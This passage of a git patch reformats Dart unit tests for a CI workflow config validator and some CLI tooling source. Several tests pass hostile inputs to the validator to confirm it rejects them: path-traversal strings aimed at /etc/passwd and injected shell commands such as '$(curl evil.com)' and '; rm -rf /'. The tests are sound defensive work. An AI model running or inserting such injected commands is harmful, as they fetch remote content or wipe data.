=> e.contains('personal_access_token_secret')), + isEmpty, + ); }); test('null pat is fine (optional, defaults 
to GITHUB_TOKEN)', () { final errors = WorkflowGenerator.validate(_validConfig()); - expect(errors.where((e) => e.contains('personal_access_token_secret')), isEmpty); + expect( + errors.where((e) => e.contains('personal_access_token_secret')), + isEmpty, + ); }); }); // ---- line_length ---- group('line_length', () { test('non-numeric line_length produces error', () { - final errors = WorkflowGenerator.validate(_validConfig(lineLength: true)); + final errors = WorkflowGenerator.validate( + _validConfig(lineLength: true), + ); expect(errors, anyElement(contains('line_length'))); }); @@ -287,7 +318,9 @@ void main() { }); test('string line_length passes', () { - final errors = WorkflowGenerator.validate(_validConfig(lineLength: '120')); + final errors = WorkflowGenerator.validate( + _validConfig(lineLength: '120'), + ); expect(errors.where((e) => e.contains('line_length')), isEmpty); }); @@ -310,154 +343,207 @@ void main() { final errors = WorkflowGenerator.validate( _validConfig(subPackages: ['just_a_string']), ); - expect(errors, anyElement(contains('sub_packages entries must be objects'))); + expect( + errors, + anyElement(contains('sub_packages entries must be objects')), + ); }); test('sub_packages with missing name produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'path': 'packages/foo'}, - ]), + _validConfig( + subPackages: [ + {'path': 'packages/foo'}, + ], + ), ); expect(errors, anyElement(contains('name must be a non-empty string'))); }); test('sub_packages with empty name produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'name': '', 'path': 'packages/foo'}, - ]), + _validConfig( + subPackages: [ + {'name': '', 'path': 'packages/foo'}, + ], + ), ); expect(errors, anyElement(contains('name must be a non-empty string'))); }); test('sub_packages with missing path produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'name': 
'foo'}, - ]), + _validConfig( + subPackages: [ + {'name': 'foo'}, + ], + ), ); expect(errors, anyElement(contains('path must be a non-empty string'))); }); test('sub_packages with empty path produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'name': 'foo', 'path': ''}, - ]), + _validConfig( + subPackages: [ + {'name': 'foo', 'path': ''}, + ], + ), ); expect(errors, anyElement(contains('path must be a non-empty string'))); }); - test('sub_packages path with directory traversal (..) produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'name': 'foo', 'path': '../../../etc/passwd'}, - ]), - ); - expect(errors, anyElement(contains('must not traverse outside the repo'))); - }); + test( + 'sub_packages path with directory traversal (..) produces error', + () { + final errors = WorkflowGenerator.validate( + _validConfig( + subPackages: [ + {'name': 'foo', 'path': '../../../etc/passwd'}, + ], + ), + ); + expect( + errors, + anyElement(contains('must not traverse outside the repo')), + ); + }, + ); test('sub_packages path with embedded traversal produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'name': 'foo', 'path': 'packages/../../../etc'}, - ]), + _validConfig( + subPackages: [ + {'name': 'foo', 'path': 'packages/../../../etc'}, + ], + ), + ); + expect( + errors, + anyElement(contains('must not traverse outside the repo')), ); - expect(errors, anyElement(contains('must not traverse outside the repo'))); }); test('sub_packages absolute path produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'name': 'foo', 'path': '/usr/local/bin'}, - ]), + _validConfig( + subPackages: [ + {'name': 'foo', 'path': '/usr/local/bin'}, + ], + ), ); expect(errors, anyElement(contains('must be a relative repo path'))); }); test('sub_packages path starting with ~ produces error', () { final errors = 
WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'name': 'foo', 'path': '~/evil'}, - ]), + _validConfig( + subPackages: [ + {'name': 'foo', 'path': '~/evil'}, + ], + ), ); expect(errors, anyElement(contains('must be a relative repo path'))); }); test('sub_packages path with backslashes produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'name': 'foo', 'path': r'packages\foo'}, - ]), + _validConfig( + subPackages: [ + {'name': 'foo', 'path': r'packages\foo'}, + ], + ), ); expect(errors, anyElement(contains('forward slashes'))); }); test('sub_packages path with unsupported characters produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'name': 'foo', 'path': 'packages/foo bar'}, - ]), + _validConfig( + subPackages: [ + {'name': 'foo', 'path': 'packages/foo bar'}, + ], + ), ); expect(errors, anyElement(contains('unsupported characters'))); }); - test('sub_packages path with leading/trailing whitespace produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'name': 'foo', 'path': ' packages/foo '}, - ]), - ); - expect(errors, anyElement(contains('whitespace'))); - }); + test( + 'sub_packages path with leading/trailing whitespace produces error', + () { + final errors = WorkflowGenerator.validate( + _validConfig( + subPackages: [ + {'name': 'foo', 'path': ' packages/foo '}, + ], + ), + ); + expect(errors, anyElement(contains('whitespace'))); + }, + ); test('sub_packages path with trailing tab triggers whitespace error', () { // Trailing \t means trimmed != value, so the whitespace check fires first. 
final errors = WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'name': 'foo', 'path': 'packages/foo\t'}, - ]), + _validConfig( + subPackages: [ + {'name': 'foo', 'path': 'packages/foo\t'}, + ], + ), ); expect(errors, anyElement(contains('whitespace'))); }); - test('sub_packages path with embedded tab triggers newlines/tabs error', () { - // Embedded tab: trim() is identity, so newlines/tabs check catches it. - final errors = WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'name': 'foo', 'path': 'packages/f\too'}, - ]), - ); - expect(errors, anyElement(contains('newlines/tabs'))); - }); + test( + 'sub_packages path with embedded tab triggers newlines/tabs error', + () { + // Embedded tab: trim() is identity, so newlines/tabs check catches it. + final errors = WorkflowGenerator.validate( + _validConfig( + subPackages: [ + {'name': 'foo', 'path': 'packages/f\too'}, + ], + ), + ); + expect(errors, anyElement(contains('newlines/tabs'))); + }, + ); test('sub_packages duplicate name produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'name': 'foo', 'path': 'packages/foo'}, - {'name': 'foo', 'path': 'packages/bar'}, - ]), + _validConfig( + subPackages: [ + {'name': 'foo', 'path': 'packages/foo'}, + {'name': 'foo', 'path': 'packages/bar'}, + ], + ), ); expect(errors, anyElement(contains('duplicate name "foo"'))); }); - test('sub_packages duplicate path (after normalization) produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'name': 'foo', 'path': 'packages/foo'}, - {'name': 'bar', 'path': 'packages/./foo'}, - ]), - ); - expect(errors, anyElement(contains('duplicate path'))); - }); + test( + 'sub_packages duplicate path (after normalization) produces error', + () { + final errors = WorkflowGenerator.validate( + _validConfig( + subPackages: [ + {'name': 'foo', 'path': 'packages/foo'}, + {'name': 'bar', 'path': 'packages/./foo'}, + ], + ), + ); + 
expect(errors, anyElement(contains('duplicate path'))); + }, + ); test('valid sub_packages passes', () { final errors = WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'name': 'core', 'path': 'packages/core'}, - {'name': 'api', 'path': 'packages/api'}, - ]), + _validConfig( + subPackages: [ + {'name': 'core', 'path': 'packages/core'}, + {'name': 'api', 'path': 'packages/api'}, + ], + ), ); expect(errors.where((e) => e.contains('sub_packages')), isEmpty); }); @@ -474,7 +560,10 @@ void main() { final config = _validConfig(); config['runner_overrides'] = 'invalid'; final errors = WorkflowGenerator.validate(config); - expect(errors, anyElement(contains('runner_overrides must be an object'))); + expect( + errors, + anyElement(contains('runner_overrides must be an object')), + ); }); test('runner_overrides with invalid platform key produces error', () { @@ -581,58 +670,85 @@ void main() { test('web_test.paths with empty string produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': [''], - }), + _validConfig( + webTest: { + 'paths': [''], + }, + ), ); expect(errors, anyElement(contains('must be a non-empty string'))); }); test('web_test.paths with absolute path produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': ['/etc/passwd'], - }), + _validConfig( + webTest: { + 'paths': ['/etc/passwd'], + }, + ), ); expect(errors, anyElement(contains('must be a relative repo path'))); }); test('web_test.paths with traversal produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': ['../../../etc/passwd'], - }), - ); - expect(errors, anyElement(contains('must not traverse outside the repo'))); - }); - - test('web_test.paths with embedded traversal (test/web/../../../etc/passwd) produces error', () { final errors = WorkflowGenerator.validate( _validConfig( - features: {'proto': false, 'lfs': false, 'web_test': true}, - webTest: 
{'paths': ['test/web/../../../etc/passwd']}, + webTest: { + 'paths': ['../../../etc/passwd'], + }, ), ); - expect(errors, anyElement(contains('must not traverse outside the repo'))); - }); - - test('web_test.paths with shell metacharacters (\$(curl evil)) produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': [r'$(curl evil)'], - }), + expect( + errors, + anyElement(contains('must not traverse outside the repo')), ); - expect(errors, anyElement(contains('unsupported characters'))); }); - test('web_test.paths with shell metacharacters (; rm -rf /) produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': ['; rm -rf /'], - }), - ); - expect(errors, anyElement(contains('unsupported characters'))); - }); + test( + 'web_test.paths with embedded traversal (test/web/../../../etc/passwd) produces error', + () { + final errors = WorkflowGenerator.validate( + _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': true}, + webTest: { + 'paths': ['test/web/../../../etc/passwd'], + }, + ), + ); + expect( + errors, + anyElement(contains('must not traverse outside the repo')), + ); + }, + ); + + test( + 'web_test.paths with shell metacharacters (\$(curl evil)) produces error', + () { + final errors = WorkflowGenerator.validate( + _validConfig( + webTest: { + 'paths': [r'$(curl evil)'], + }, + ), + ); + expect(errors, anyElement(contains('unsupported characters'))); + }, + ); + + test( + 'web_test.paths with shell metacharacters (; rm -rf /) produces error', + () { + final errors = WorkflowGenerator.validate( + _validConfig( + webTest: { + 'paths': ['; rm -rf /'], + }, + ), + ); + expect(errors, anyElement(contains('unsupported characters'))); + }, + ); test('web_test.paths duplicate (after normalization) produces error', () { final errors = WorkflowGenerator.validate( @@ -648,57 +764,75 @@ void main() { test('web_test.paths with backslashes produces error', () { final 
errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': [r'test\web\foo_test.dart'], - }), + _validConfig( + webTest: { + 'paths': [r'test\web\foo_test.dart'], + }, + ), ); expect(errors, anyElement(contains('forward slashes'))); }); test('web_test.paths with unsupported characters produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': ['test/web test/foo.dart'], - }), + _validConfig( + webTest: { + 'paths': ['test/web test/foo.dart'], + }, + ), ); expect(errors, anyElement(contains('unsupported characters'))); }); test('web_test.paths with leading whitespace produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': [' test/web/foo_test.dart'], - }), + _validConfig( + webTest: { + 'paths': [' test/web/foo_test.dart'], + }, + ), ); expect(errors, anyElement(contains('whitespace'))); }); test('web_test.paths with tilde produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': ['~/test/foo.dart'], - }), + _validConfig( + webTest: { + 'paths': ['~/test/foo.dart'], + }, + ), ); expect(errors, anyElement(contains('must be a relative repo path'))); }); test('web_test.paths with newline produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': ['test/foo\nbar.dart'], - }), + _validConfig( + webTest: { + 'paths': ['test/foo\nbar.dart'], + }, + ), ); expect(errors, anyElement(contains('newlines/tabs'))); }); - test('web_test.paths with embedded traversal that escapes repo produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': ['test/../../../etc/passwd'], - }), - ); - expect(errors, anyElement(contains('must not traverse outside the repo'))); - }); + test( + 'web_test.paths with embedded traversal that escapes repo produces error', + () { + final errors = WorkflowGenerator.validate( + _validConfig( + webTest: { + 'paths': 
['test/../../../etc/passwd'], + }, + ), + ); + expect( + errors, + anyElement(contains('must not traverse outside the repo')), + ); + }, + ); test('web_test.paths with embedded .. that stays in repo is fine', () { // test/web/../../etc/passwd normalizes to etc/passwd (still inside repo) @@ -715,54 +849,66 @@ void main() { test('web_test.paths with shell metacharacter \$ produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': [r'$(curl evil.com)'], - }), + _validConfig( + webTest: { + 'paths': [r'$(curl evil.com)'], + }, + ), ); expect(errors, anyElement(contains('unsupported characters'))); }); test('web_test.paths with shell metacharacter ; produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': ['test/foo; rm -rf /'], - }), + _validConfig( + webTest: { + 'paths': ['test/foo; rm -rf /'], + }, + ), ); expect(errors, anyElement(contains('unsupported characters'))); }); test('web_test.paths with duplicate paths produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': ['test/web/foo_test.dart', 'test/web/foo_test.dart'], - }), + _validConfig( + webTest: { + 'paths': ['test/web/foo_test.dart', 'test/web/foo_test.dart'], + }, + ), ); expect(errors, anyElement(contains('duplicate path'))); }); test('web_test.paths with duplicate normalized paths produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': ['test/web/./foo_test.dart', 'test/web/foo_test.dart'], - }), + _validConfig( + webTest: { + 'paths': ['test/web/./foo_test.dart', 'test/web/foo_test.dart'], + }, + ), ); expect(errors, anyElement(contains('duplicate path'))); }); test('web_test.paths with trailing whitespace produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': ['test/web/foo_test.dart '], - }), + _validConfig( + webTest: { + 'paths': ['test/web/foo_test.dart '], + }, + ), ); 
expect(errors, anyElement(contains('whitespace'))); }); test('web_test.paths with tab produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': ['test/web/\tfoo_test.dart'], - }), + _validConfig( + webTest: { + 'paths': ['test/web/\tfoo_test.dart'], + }, + ), ); expect(errors, anyElement(contains('newlines/tabs'))); }); @@ -809,41 +955,87 @@ void main() { expect(errors, anyElement(contains('unknown key "concurreny"'))); }); - test('cross-validation: web_test config present but feature disabled produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig( - features: {'proto': false, 'lfs': false, 'web_test': false}, - webTest: {'concurrency': 2, 'paths': ['test/web/']}, - ), - ); - expect(errors, anyElement(contains('web_test config is present but ci.features.web_test is not enabled'))); - }); + test( + 'cross-validation: web_test config present but feature disabled produces error', + () { + final errors = WorkflowGenerator.validate( + _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': false}, + webTest: { + 'concurrency': 2, + 'paths': ['test/web/'], + }, + ), + ); + expect( + errors, + anyElement( + contains( + 'web_test config is present but ci.features.web_test is not enabled', + ), + ), + ); + }, + ); - test('cross-validation: web_test feature enabled but config wrong type produces error', () { - final config = _validConfig( - features: {'proto': false, 'lfs': false, 'web_test': true}, - ); - config['web_test'] = 'yes'; - final errors = WorkflowGenerator.validate(config); - expect(errors, anyElement(contains('web_test must be an object'))); - }); + test( + 'cross-validation: web_test feature enabled but config wrong type produces error', + () { + final config = _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': true}, + ); + config['web_test'] = 'yes'; + final errors = WorkflowGenerator.validate(config); + expect(errors, anyElement(contains('web_test must be an 
object'))); + }, + ); + + test( + 'cross-validation: web_test feature enabled with no config object (null) is allowed, uses defaults', + () { + final errors = WorkflowGenerator.validate( + _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': true}, + // webTest: null (omitted) — config is optional when feature is enabled + ), + ); + expect(errors.where((e) => e.contains('web_test')), isEmpty); + }, + ); + + test( + 'cross-validation: web_test feature enabled with explicit null config is allowed', + () { + final config = _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': true}, + ); + config['web_test'] = null; + final errors = WorkflowGenerator.validate(config); + expect(errors.where((e) => e.contains('web_test')), isEmpty); + }, + ); }); // ---- fully valid config produces no errors ---- test('fully valid config produces no errors', () { - final errors = WorkflowGenerator.validate(_validConfig( - dartSdk: '3.9.2', - features: {'proto': true, 'lfs': false, 'web_test': true}, - platforms: ['ubuntu', 'macos'], - secrets: {'API_KEY': 'MY_SECRET'}, - pat: 'MY_PAT', - lineLength: 120, - subPackages: [ - {'name': 'core', 'path': 'packages/core'}, - ], - runnerOverrides: {'ubuntu': 'custom-runner'}, - webTest: {'concurrency': 2, 'paths': ['test/web/']}, - )); + final errors = WorkflowGenerator.validate( + _validConfig( + dartSdk: '3.9.2', + features: {'proto': true, 'lfs': false, 'web_test': true}, + platforms: ['ubuntu', 'macos'], + secrets: {'API_KEY': 'MY_SECRET'}, + pat: 'MY_PAT', + lineLength: 120, + subPackages: [ + {'name': 'core', 'path': 'packages/core'}, + ], + runnerOverrides: {'ubuntu': 'custom-runner'}, + webTest: { + 'concurrency': 2, + 'paths': ['test/web/'], + }, + ), + ); expect(errors, isEmpty); }); @@ -879,21 +1071,23 @@ void main() { test('returns null when config.json exists but has no "ci" key', () { final configDir = Directory('${tempDir.path}/.runtime_ci')..createSync(); - 
File('${configDir.path}/config.json').writeAsStringSync(json.encode({ - 'repo_name': 'test_repo', - })); + File( + '${configDir.path}/config.json', + ).writeAsStringSync(json.encode({'repo_name': 'test_repo'})); final result = WorkflowGenerator.loadCiConfig(tempDir.path); expect(result, isNull); }); test('returns the ci map when config.json has a valid "ci" section', () { final configDir = Directory('${tempDir.path}/.runtime_ci')..createSync(); - File('${configDir.path}/config.json').writeAsStringSync(json.encode({ - 'ci': { - 'dart_sdk': '3.9.2', - 'features': {'proto': true}, - }, - })); + File('${configDir.path}/config.json').writeAsStringSync( + json.encode({ + 'ci': { + 'dart_sdk': '3.9.2', + 'features': {'proto': true}, + }, + }), + ); final result = WorkflowGenerator.loadCiConfig(tempDir.path); expect(result, isNotNull); expect(result, isA>()); @@ -903,29 +1097,45 @@ void main() { test('throws StateError on malformed JSON', () { final configDir = Directory('${tempDir.path}/.runtime_ci')..createSync(); - File('${configDir.path}/config.json').writeAsStringSync('{ not valid json'); + File( + '${configDir.path}/config.json', + ).writeAsStringSync('{ not valid json'); expect( () => WorkflowGenerator.loadCiConfig(tempDir.path), - throwsA(isA().having((e) => e.message, 'message', contains('Malformed JSON'))), + throwsA( + isA().having( + (e) => e.message, + 'message', + contains('Malformed JSON'), + ), + ), ); }); test('throws StateError when "ci" is not a Map', () { final configDir = Directory('${tempDir.path}/.runtime_ci')..createSync(); - File('${configDir.path}/config.json').writeAsStringSync(json.encode({ - 'ci': 'not_a_map', - })); + File( + '${configDir.path}/config.json', + ).writeAsStringSync(json.encode({'ci': 'not_a_map'})); expect( () => WorkflowGenerator.loadCiConfig(tempDir.path), - throwsA(isA().having((e) => e.message, 'message', contains('object'))), + throwsA( + isA().having( + (e) => e.message, + 'message', + contains('object'), + ), + ), ); }); 
test('throws StateError when "ci" is a list instead of a map', () { final configDir = Directory('${tempDir.path}/.runtime_ci')..createSync(); - File('${configDir.path}/config.json').writeAsStringSync(json.encode({ - 'ci': [1, 2, 3], - })); + File('${configDir.path}/config.json').writeAsStringSync( + json.encode({ + 'ci': [1, 2, 3], + }), + ); expect( () => WorkflowGenerator.loadCiConfig(tempDir.path), throwsA(isA()), @@ -934,10 +1144,13 @@ void main() { }); // =========================================================================== - // P0: render() — web_test output integration tests + // P0: render() — validation guard and web_test output integration tests // =========================================================================== group('WorkflowGenerator.render()', () { - Map _minimalValidConfig({bool webTest = false, Map? webTestConfig}) { + Map _minimalValidConfig({ + bool webTest = false, + Map? webTestConfig, + }) { return _validConfig( dartSdk: '3.9.2', features: { @@ -951,49 +1164,140 @@ void main() { ); } - test('web_test=false: rendered output does not contain web-test job', () { + // ---- render() validation guard (defense-in-depth) ---- + test( + 'render throws StateError when config is invalid (missing dart_sdk)', + () { + final gen = WorkflowGenerator( + ciConfig: {'features': {}}, + toolingVersion: '0.0.0-test', + ); + expect( + () => gen.render(), + throwsA( + isA().having( + (e) => e.message, + 'message', + allOf( + contains('Cannot render with invalid config'), + contains('dart_sdk'), + ), + ), + ), + ); + }, + ); + + test( + 'render throws StateError when config has multiple validation errors', + () { + final gen = WorkflowGenerator( + ciConfig: {}, + toolingVersion: '0.0.0-test', + ); + expect( + () => gen.render(), + throwsA( + isA().having( + (e) => e.message, + 'message', + allOf( + contains('Cannot render with invalid config'), + contains('dart_sdk'), + contains('features'), + ), + ), + ), + ); + }, + ); + + test('render throws 
StateError when config has invalid web_test type', () { final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(webTest: false), + ciConfig: _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': true}, + )..['web_test'] = 'yes', toolingVersion: '0.0.0-test', ); - final rendered = gen.render(); - expect(rendered, isNot(contains('web-test:'))); - expect(rendered, isNot(contains('dart test -p chrome'))); + expect( + () => gen.render(), + throwsA( + isA().having( + (e) => e.message, + 'message', + allOf( + contains('Cannot render with invalid config'), + contains('web_test must be an object'), + ), + ), + ), + ); }); - test('web_test=true: rendered output contains web-test job and chrome test', () { + test('render succeeds on valid config', () { final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(webTest: true), + ciConfig: _minimalValidConfig(webTest: false), toolingVersion: '0.0.0-test', ); final rendered = gen.render(); - expect(rendered, contains('web-test:')); - expect(rendered, contains('dart test -p chrome')); + expect(rendered, isNotEmpty); + expect(rendered, contains('name:')); }); - test('web_test=true with paths: rendered output includes path args', () { + test('web_test=false: rendered output does not contain web-test job', () { final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig( - webTest: true, - webTestConfig: {'paths': ['test/web/foo_test.dart'], 'concurrency': 2}, - ), + ciConfig: _minimalValidConfig(webTest: false), toolingVersion: '0.0.0-test', ); final rendered = gen.render(); - expect(rendered, contains("'test/web/foo_test.dart'")); - expect(rendered, contains('--concurrency=2')); + expect(rendered, isNot(contains('web-test:'))); + expect(rendered, isNot(contains('dart test -p chrome'))); }); - test('web_test=true with concurrency at upper bound (32): rendered output uses 32', () { + test( + 'web_test=true with omitted config uses default concurrency and no explicit paths', + () { + final gen = 
WorkflowGenerator( + ciConfig: _minimalValidConfig(webTest: true), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + expect(rendered, contains('web-test:')); + expect(rendered, contains('dart test -p chrome')); + expect(rendered, contains('--concurrency=1')); + expect(rendered, isNot(contains("'test/"))); + }, + ); + + test('web_test=true with paths: rendered output includes path args', () { final gen = WorkflowGenerator( ciConfig: _minimalValidConfig( webTest: true, - webTestConfig: {'concurrency': 32}, + webTestConfig: { + 'paths': ['test/web/foo_test.dart'], + 'concurrency': 2, + }, ), toolingVersion: '0.0.0-test', ); final rendered = gen.render(); - expect(rendered, contains('--concurrency=32')); + expect(rendered, contains("'test/web/foo_test.dart'")); + expect(rendered, contains('--concurrency=2')); }); + + test( + 'web_test=true with concurrency at upper bound (32): rendered output uses 32', + () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig( + webTest: true, + webTestConfig: {'concurrency': 32}, + ), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + expect(rendered, contains('--concurrency=32')); + }, + ); }); } From 9292802b3927384f70b5c01ffe8f69b203beca18 Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Wed, 25 Feb 2026 00:50:35 +0000 Subject: [PATCH 05/16] bot(format): apply dart format --line-length 120 [skip ci] --- lib/src/cli/commands/test_command.dart | 38 +- lib/src/cli/manage_cicd.dart | 795 +++++----------------- lib/src/cli/utils/step_summary.dart | 57 +- lib/src/cli/utils/workflow_generator.dart | 232 ++----- 4 files changed, 258 insertions(+), 864 deletions(-) diff --git a/lib/src/cli/commands/test_command.dart b/lib/src/cli/commands/test_command.dart index 807a249..4103fe7 100644 --- a/lib/src/cli/commands/test_command.dart +++ b/lib/src/cli/commands/test_command.dart @@ -27,8 +27,7 @@ class TestCommand extends 
Command { final String name = 'test'; @override - final String description = - 'Run dart test with full output capture and job summary.'; + final String description = 'Run dart test with full output capture and job summary.'; @override Future run() async { @@ -44,9 +43,7 @@ class TestCommand extends Command { final failures = []; // Determine log directory: TEST_LOG_DIR (CI) or .dart_tool/test-logs/ (local) - final logDir = - Platform.environment['TEST_LOG_DIR'] ?? - '$repoRoot/.dart_tool/test-logs'; + final logDir = Platform.environment['TEST_LOG_DIR'] ?? '$repoRoot/.dart_tool/test-logs'; Directory(logDir).createSync(recursive: true); Logger.info('Log directory: $logDir'); @@ -57,9 +54,7 @@ class TestCommand extends Command { final testDir = Directory('$repoRoot/test'); if (!testDir.existsSync()) { Logger.success('No test/ directory found — skipping root tests'); - StepSummary.write( - '## Test Results\n\n**No test/ directory found — skipped.**\n', - ); + StepSummary.write('## Test Results\n\n**No test/ directory found — skipped.**\n'); } else { // Build test arguments with two file reporters + expanded console output final testArgs = [ @@ -79,11 +74,7 @@ class TestCommand extends Command { // Use Process.start with piped output so we can both stream to console // AND capture the full output for summary generation. 
- final process = await Process.start( - Platform.resolvedExecutable, - testArgs, - workingDirectory: repoRoot, - ); + final process = await Process.start(Platform.resolvedExecutable, testArgs, workingDirectory: repoRoot); // Stream stdout and stderr to console in real-time while capturing final stdoutBuf = StringBuffer(); @@ -103,19 +94,14 @@ class TestCommand extends Command { final exitCode = await process.exitCode.timeout( processTimeout, onTimeout: () { - Logger.error( - 'Test process exceeded ${processTimeout.inMinutes}-minute timeout — killing.', - ); + Logger.error('Test process exceeded ${processTimeout.inMinutes}-minute timeout — killing.'); process.kill(); // No signal arg — cross-platform safe return -1; }, ); try { - await Future.wait([ - stdoutDone, - stderrDone, - ]).timeout(const Duration(seconds: 30)); + await Future.wait([stdoutDone, stderrDone]).timeout(const Duration(seconds: 30)); } catch (_) { // Ignore stream errors (e.g. process killed before streams drained) } @@ -180,9 +166,7 @@ class TestCommand extends Command { if (pubGetResult.exitCode != 0) { final pubGetStderr = (pubGetResult.stderr as String).trim(); if (pubGetStderr.isNotEmpty) Logger.error(pubGetStderr); - Logger.error( - ' dart pub get failed for $name (exit code ${pubGetResult.exitCode})', - ); + Logger.error(' dart pub get failed for $name (exit code ${pubGetResult.exitCode})'); failures.add(name); continue; } @@ -197,9 +181,7 @@ class TestCommand extends Command { final spExitCode = await spProcess.exitCode.timeout( processTimeout, onTimeout: () { - Logger.error( - 'Test process for $name exceeded ${processTimeout.inMinutes}-minute timeout — killing.', - ); + Logger.error('Test process for $name exceeded ${processTimeout.inMinutes}-minute timeout — killing.'); spProcess.kill(); // No signal arg — cross-platform safe return -1; }, @@ -214,9 +196,7 @@ class TestCommand extends Command { } if (failures.isNotEmpty) { - Logger.error( - 'Tests failed for ${failures.length} 
package(s): ${failures.join(', ')}', - ); + Logger.error('Tests failed for ${failures.length} package(s): ${failures.join(', ')}'); final failureBullets = failures.map((name) => '- `$name`').join('\n'); StepSummary.write('\n## Sub-package Test Failures\n\n$failureBullets\n'); exit(1); diff --git a/lib/src/cli/manage_cicd.dart b/lib/src/cli/manage_cicd.dart index 463b4be..2dd1ade 100644 --- a/lib/src/cli/manage_cicd.dart +++ b/lib/src/cli/manage_cicd.dart @@ -86,25 +86,19 @@ String _resolveToolingPackageRoot() { final configFile = File('${dir.path}/.dart_tool/package_config.json'); if (configFile.existsSync()) { try { - final configJson = - json.decode(configFile.readAsStringSync()) as Map; + final configJson = json.decode(configFile.readAsStringSync()) as Map; final packages = configJson['packages'] as List? ?? []; for (final pkg in packages) { - if (pkg is Map && - pkg['name'] == 'runtime_ci_tooling') { + if (pkg is Map && pkg['name'] == 'runtime_ci_tooling') { final rootUri = pkg['rootUri'] as String? ?? ''; if (rootUri.startsWith('file://')) { return Uri.parse(rootUri).toFilePath(); } // Relative URI -- resolve against the .dart_tool/ directory - final resolved = Uri.parse( - '${dir.path}/.dart_tool/', - ).resolve(rootUri); + final resolved = Uri.parse('${dir.path}/.dart_tool/').resolve(rootUri); final resolvedPath = resolved.toFilePath(); // Strip trailing slash - return resolvedPath.endsWith('/') - ? resolvedPath.substring(0, resolvedPath.length - 1) - : resolvedPath; + return resolvedPath.endsWith('/') ? resolvedPath.substring(0, resolvedPath.length - 1) : resolvedPath; } } } catch (_) {} @@ -120,9 +114,7 @@ String _resolveToolingPackageRoot() { } // Fallback: assume scripts/prompts/ (legacy location in consuming repos) - _warn( - 'Could not resolve runtime_ci_tooling package root. Prompt scripts may not be found.', - ); + _warn('Could not resolve runtime_ci_tooling package root. 
Prompt scripts may not be found.'); return Directory.current.path; } @@ -201,9 +193,7 @@ void main(List args) async { if (repoRoot == null) { _error('Could not find ${config.repoName} repo root.'); _error('Run this script from inside the repository.'); - _error( - 'If this is a new project, run "init" first to create .runtime_ci/config.json.', - ); + _error('If this is a new project, run "init" first to create .runtime_ci/config.json.'); exit(1); } @@ -298,19 +288,14 @@ Future _runSetup(String repoRoot) async { if (geminiKey != null && geminiKey.isNotEmpty) { _success('GEMINI_API_KEY is set'); } else { - _warn( - 'GEMINI_API_KEY is not set. Set it via: export GEMINI_API_KEY=', - ); + _warn('GEMINI_API_KEY is not set. Set it via: export GEMINI_API_KEY='); } - final ghToken = - Platform.environment['GH_TOKEN'] ?? Platform.environment['GITHUB_TOKEN']; + final ghToken = Platform.environment['GH_TOKEN'] ?? Platform.environment['GITHUB_TOKEN']; if (ghToken != null && ghToken.isNotEmpty) { _success('GitHub token is set'); } else { - _info( - 'No GH_TOKEN/GITHUB_TOKEN set. Run "gh auth login" for GitHub CLI auth.', - ); + _info('No GH_TOKEN/GITHUB_TOKEN set. Run "gh auth login" for GitHub CLI auth.'); } // Install Dart dependencies @@ -366,10 +351,7 @@ Future _runValidate(String repoRoot) async { } } else if (file.endsWith('.dart')) { // Validate Dart files compile - final result = Process.runSync('dart', [ - 'analyze', - path, - ], workingDirectory: repoRoot); + final result = Process.runSync('dart', ['analyze', path], workingDirectory: repoRoot); if (result.exitCode == 0) { _success('Valid Dart: $file'); } else { @@ -429,9 +411,7 @@ Future _runExplore(String repoRoot) async { _header('Stage 1: Explorer Agent 